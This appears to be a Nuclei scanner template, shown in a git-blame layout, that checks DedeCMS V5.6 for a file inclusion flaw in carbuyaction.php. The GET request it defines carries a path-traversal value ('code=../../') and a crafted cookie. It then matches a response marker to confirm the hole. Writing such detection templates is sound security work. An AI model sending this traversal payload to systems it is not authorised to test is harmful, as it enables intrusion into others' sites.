2021-03-15 08:40:45 +00:00
|
|
|
id: dedecms-carbuyaction-fileinclude
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: DedeCmsV5.6 Carbuyaction Fileinclude
|
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
|
|
|
reference: https://www.cnblogs.com/milantgh/p/3615986.html
|
|
|
|
tags: dedecms
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
|
|
|
|
headers:
|
|
|
|
Cookie: code=cod
|
2021-07-21 12:56:36 +00:00
|
|
|
redirects: true
|
2021-03-15 08:40:45 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "Cod::respond()"
|
|
|
|
part: body
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|